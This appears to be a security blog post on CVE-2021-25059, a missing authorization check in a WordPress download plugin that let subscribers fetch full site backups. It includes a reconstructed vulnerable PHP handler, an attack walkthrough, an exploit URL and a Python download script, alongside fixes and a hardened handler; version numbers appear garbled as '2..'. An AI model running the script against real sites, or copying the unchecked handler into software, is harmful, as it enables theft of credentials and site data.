On many WordPress websites, the Download Plugin is a popular tool for backing up and managing site files. But what if a simple coding mistake let any registered user download a full backup of your site, with nothing more than an ordinary account? That is exactly what happened in CVE-2021-25059.
In this post, we break down how this vulnerability happened, show the affected code, and walk through how attackers could abuse it. We also cover the steps you need to take to stay safe.
The Vulnerability in Simple Terms
The affected plugin is Download Plugin (not to be confused with similarly named plugins). Until version 2.., it had a serious authorization issue: anyone with a WordPress account, even a plain subscriber, could download a complete backup of the website.
This was not just about downloading a single file. Full site backups typically include the WordPress core files, plugins, themes and configuration files such as wp-config.php (which holds the database credentials), and sometimes a dump of the database too. That can mean private posts, user records and password hashes for attackers to use against your site or reuse elsewhere.
Reference Links
- NVD - CVE-2021-25059
- Wordfence Advisory
- Original Plugin in Plugin Directory
Where Did it Go Wrong? (Code Snippet)
In WordPress, *nonces* protect URLs and forms against cross-site request forgery: a nonce is a short-lived token tied to a user, an action and the site's secret salts, and it proves that the request was made deliberately by that user. A nonce is not an authorization check. WordPress will happily issue one to a subscriber, so critical operations such as downloading a backup must additionally verify the user's capability with current_user_can() (administrators have manage_options, subscribers do not).
The plugin did the first part and skipped the second. Here is a simplified version of how the vulnerable code worked (the actual code differs in detail, but this shows the key problem):
```php
<?php
// Simplified reconstruction of the vulnerable handler (the plugin's real code differs in detail).
add_action('admin_init', 'download_plugin_backup');

function download_plugin_backup() {
    // admin_init runs for every logged-in user who loads a wp-admin page, subscribers included.
    if (isset($_GET['download_backup']) && isset($_GET['_wpnonce'])) {
        // MISSING: current_user_can() check for an administrator-level capability
        if (wp_verify_nonce($_GET['_wpnonce'], 'download_plugin_backup')) {
            // The file name is taken straight from the request and never validated.
            $file = $_GET['file'];
            // Sends the backup file for download...
            header('Content-Type: application/zip');
            header('Content-Disposition: attachment; filename="' . $file . '"');
            readfile('/path/to/backups/' . $file);
            exit;
        }
    }
}
```
What went wrong:
There was no check that the current user is an administrator or otherwise trusted. The nonce check alone does not help: a nonce is issued to whichever logged-in user the plugin generates it for, so a subscriber who obtains a nonce for their own session passes wp_verify_nonce() and gets the backup. On top of that, the file name comes straight from the request, so the handler trusts user input for both the "who" and the "what".
Here is a typical attack flow, step by step:
1. Create a basic account on the target's WordPress site. Many sites allow open registration, and new accounts get the 'subscriber' role by default.
2. Obtain a valid nonce for the download_plugin_backup action from the site's own pages or scripts (for example via the browser's developer tools). WordPress nonces are keyed with the site's secret salts and bound to the user and action, so they cannot be guessed or brute-forced; they have to be issued to the attacker's session, which the vulnerable plugin did.
3. Request the download URL with that nonce and the name of a backup file:
```
https://target-site.com/wp-admin/?download_backup=1&_wpnonce=xxxxx&file=site-backup.zip
```
4. The plugin hands over the backup zip, no questions asked, and the attacker saves it locally.
5. The attacker extracts sensitive content: configuration files (wp-config.php with the database credentials), uploads, and the database dump if the backup includes one.
Real-world damage: full site compromise, database leaks, credential harvesting, and more.
Attackers could automate the download with a simple script like this, after registering an account:
```python
import requests

BASE = "https://victim-site.com/"          # site root: wp-login.php lives here
ADMIN = BASE + "wp-admin/"                 # admin_init fires on any wp-admin request
file_to_download = "backup-2021-12-31.zip"
nonce = "abcdef123456"                     # attacker obtains this nonce for their own session
download_url = f"{ADMIN}?download_backup=1&_wpnonce={nonce}&file={file_to_download}"

session = requests.Session()
# Log in as the low-privilege user first; the nonce is only valid for this session's user
session.post(BASE + "wp-login.php", data={
    "log": "subscriber",
    "pwd": "password",
    "wp-submit": "Log In",
})

# Download the backup
r = session.get(download_url)
if r.status_code == 200 and r.headers.get("Content-Type", "").startswith("application/zip"):
    with open(file_to_download, "wb") as f:
        f.write(r.content)
    print("Backup downloaded!")
else:
    print("Failed to download backup.")
```
Who Was Affected?
Every WordPress site with Download Plugin <2.. installed.
If your site allows user registration, any registered user can exploit this. It does not matter which hosting you use or which other plugins and themes are active; the missing check is in the plugin itself.
Fix and Stay Safe
What was fixed:
From version 2.., the plugin checks the current user's capability before serving a download, so only administrators can trigger it.
What to do:
1. Update Download Plugin to at least version 2.. as soon as possible.
2. For any plugin that offers downloads or backups, confirm that only administrators can use the feature, and consider turning off open registration (Settings > General > "Anyone can register") if your site does not need it.
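To make "check the capability, not just the nonce" concrete, here is a hardened version of the simplified handler shown earlier. This is an added example written for this post, not the plugin's actual code or its fix; the function names, the download_plugin_backup action and the backup directory location are assumptions for illustration. It also closes the second gap in the original snippet by refusing any file name that resolves outside the backup directory.

```php
<?php
// Added example (not the plugin's own code). Function and action names are illustrative,
// and the backup directory is an assumed location.
add_action('admin_init', 'download_plugin_backup_hardened');

function download_plugin_backup_hardened() {
    if (!isset($_GET['download_backup'])) {
        return;
    }

    // 1. Authorization: require a capability, not merely a logged-in session.
    //    Administrators have manage_options; subscribers do not.
    if (!current_user_can('manage_options')) {
        wp_die(esc_html__('You are not allowed to download backups.'), '', array('response' => 403));
    }

    // 2. Intent (CSRF): check_admin_referer() verifies the _wpnonce for this action
    //    and stops execution if it is missing or invalid.
    check_admin_referer('download_plugin_backup');

    // 3. Path handling: never hand request input to readfile() unchecked.
    $backup_dir = realpath(WP_CONTENT_DIR . '/uploads/download-plugin-backups'); // assumed location
    $requested  = basename(wp_unslash($_GET['file'] ?? ''));   // drops any directory components
    $path       = ($backup_dir !== false && $requested !== '') ? realpath($backup_dir . '/' . $requested) : false;

    if ($path === false
        || strpos($path, $backup_dir . DIRECTORY_SEPARATOR) !== 0   // must stay inside the backup dir
        || pathinfo($path, PATHINFO_EXTENSION) !== 'zip') {         // only serve backup archives
        wp_die(esc_html__('Invalid backup file.'), '', array('response' => 400));
    }

    nocache_headers();
    header('Content-Type: application/zip');
    header('Content-Disposition: attachment; filename="' . $requested . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit;
}

// Building the download link in the admin UI. The nonce is still issued per user,
// but it no longer matters who holds one: the handler checks the capability first.
function download_plugin_backup_link($file) {
    $url = add_query_arg(
        array('download_backup' => 1, 'file' => rawurlencode(basename($file))),
        admin_url()
    );
    return wp_nonce_url($url, 'download_plugin_backup');
}
```

The order of the three checks matters less than their presence: the capability check is what actually fixes CVE-2021-25059, check_admin_referer() keeps an administrator from being tricked into triggering the download from another site, and the realpath() containment test means a request for `../../wp-config.php` is rejected even by an administrator.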
Conclusion
CVE-2021-25059 teaches a simple lesson: never assume a user is allowed to do something just because they are logged in, and never treat a nonce as a substitute for an authorization check. Always verify the user's capability.
A minor code oversight put the data of every site running the plugin at risk. If you use the Download Plugin, update now. Stay alert for similar flaws in other backup plugins, and monitor WordPress plugin security advisories regularly.
Sources
- NVD CVE-2021-25059
- Wordfence: The Download Plugin <= 2.. - Authenticated Arbitrary Directory Download via Backup Download
- Plugin Official Page
Timeline
Published on: 11/28/2022 14:15:00 UTC
Last modified on: 11/30/2022 15:15:00 UTC